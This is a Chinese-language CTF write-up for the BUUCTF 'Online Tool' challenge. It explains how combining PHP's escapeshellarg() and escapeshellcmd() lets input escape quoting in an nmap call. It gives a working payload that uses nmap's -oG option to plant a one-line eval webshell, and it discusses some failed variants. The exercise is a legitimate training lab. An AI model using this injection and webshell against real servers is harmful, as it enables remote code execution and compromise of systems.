https://buuoj.cn/challenges#[BUUCTF%202018]Online%20Tool

这道题都是没见过的，当是拓展知识了，主要考察了escapeshellarg()函数和escapeshellcmd()这两个函数混用产生的安全隐患。 以及对nmap指令参数的了解

CVE-2016-10045，补丁在PHPMailer 5.2.20中被发布。

源代码：

<?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR&#​39;])) {    $_SERVER['REMOTE_ADDR&#​39;] = $_SERVER['HTTP_X_FORWARDED_FOR&#​39;]; } if(!isset($_GET['host&#​39;])) {    highlight_file(__FILE__); } else {    $host = $_GET['host&#​39;];    $host = escapeshellarg($host);    $host = escapeshellcmd($host);    $sandbox = md5("glzjin&#​34;. $_SERVER['REMOTE_ADDR&#​39;]);    echo 'you are in sandbox &#​39;.$sandbox;    @mkdir($sandbox);    chdir($sandbox);    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host); } ?>

第一个if这里：

   remote_addr和x_forwarded_for这两个是见的比较多的，服务器获取ip用的，这里这里是要求remote_addr和http_x_forwarded_for相同，但是也没加else所以没有什么用

第二个if：

php官方文档：https://www.php.net/manual/zh/function.escapeshellarg.php

escapeshellarg — 把字符串转码为可以在 shell 命令里使用的参数 功能 ：escapeshellarg() 将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号，这样以确保能够直接将一个字符串传入 shell 函数，shell 函数包含 exec(), system() 执行运算符(反引号) 定义 ：

php官方文档：https://www.php.net/manual/zh/function.escapeshellcmd.php

escapeshellcmd — shell 元字符转义 功能：escapeshellcmd() 对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。 此函数保证用户输入的数据在传送到 exec() 或 system() 函数，或者 执行操作符 之前进行转义。 反斜线（\）会在以下字符之前插入： &#;`|*?~<>^()[]{}$, \x0A 和 \xFF*。 *’ 和 “ 仅在不配对儿的时候被转义。 在 Windows 平台上，所有这些字符以及 % 和 ! 字符都会被空格代替。 定义 ：

那么这两个结合在一起有什么效果呢：https://paper.seebug.org/164/  (PHP escapeshellarg()+escapeshellcmd() 之殇)

传入的参数是：172.17.0.2' -v -d a=1 经过escapeshellarg处理后变成了'172.17.0.2&#​39;\'&#​39; -v -d a=1'，即先对单引号转义，再用单引号将左右两部分括起来从而起到连接的作用。 经过escapeshellcmd处理后变成'172.17.0.2&#​39;\\'&#​39; -v -d a=1\'，这是因为escapeshellcmd对\以及最后那个不配对儿的引号进行了转义：http://php.net/manual/zh/function.escapeshellcmd.php 最后执行的命令是curl '172.17.0.2&#​39;\\'&#​39; -v -d a=1\'，由于中间的\\被解释为\而不再是转义字符，所以后面的&#​39;没有被转义，与再后面的'配对儿成了一个空白连接符。所以可以简化为curl 172.17.0.2\ -v -d a=1'，即向172.17.0.2\发起请求，POST 数据为a=1'。

https://blog.csdn.net/weixin_40934002/article/details/80428300  （Linux Shell 单引号 双引号 使用区别）

然后看源代码中:system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);//执行把host传进来的命令

所以我们的思路就是构造payload使得它可以再完成部分的检测后最后执行最后一句的nmap命令

这里代码的本意是希望我们输入host这样的参数做一个扫描，通过上面的两个函数来进行规则过滤转译，我们的输入会被单引号引起来，但是因为我们看到了上面的漏洞所以我们可以逃脱这个引号的束缚

这里常见的命令后注入操作如 | & &&都不行，虽然我们通过上面的操作逃过了单引号，但escapeshellcmd会对这些特殊符号前面加上\来转移…

这时候搜索可以发现在nmap命令中 有一个参数-oG可以实现将命令和结果写到文件

?host=' <?php @eval($_POST["hack&#​34;]);?> -oG hack.php '

这里注意xx.php前面要加上Starting前的目录，不然路径出问题会404

执行后会返回的字段中Starting前就是文件夹名

payload那里错了几次，一些细节的错误会导致没法访问到的

先是后面没有加引号

?host=' <?php @eval($_POST["hack&#​34;]);?> -oG hack.php

我们可以在线测试一下

'&#​39;\\'&#​39; \<\?php phpinfo\(\)\;\?\> -oG test.php\'

返回结果是上面那样文件名后面会多一个引号

然后是加引号但引号前没有空格

?host=' <?php @eval($_POST["hack&#​34;]);?> -oG hack.php'

运行结果如下

'&#​39;\\'&#​39; \<\?php phpinfo\(\)\;\?\> -oG test.php'\\&#​39;'&#​39;

文件名后面就会多出\

所以要注意细节

这里用的一句话木马，也可以用其他语句：

https://blog.csdn.net/xhy18634297976/article/details/122852540

查看phpinfo()

• 1

查看flag

但是后面这两种我一直弄不好也不知道可行性，但是传一句话木马无疑是大家都会的比较简单的找flag方式。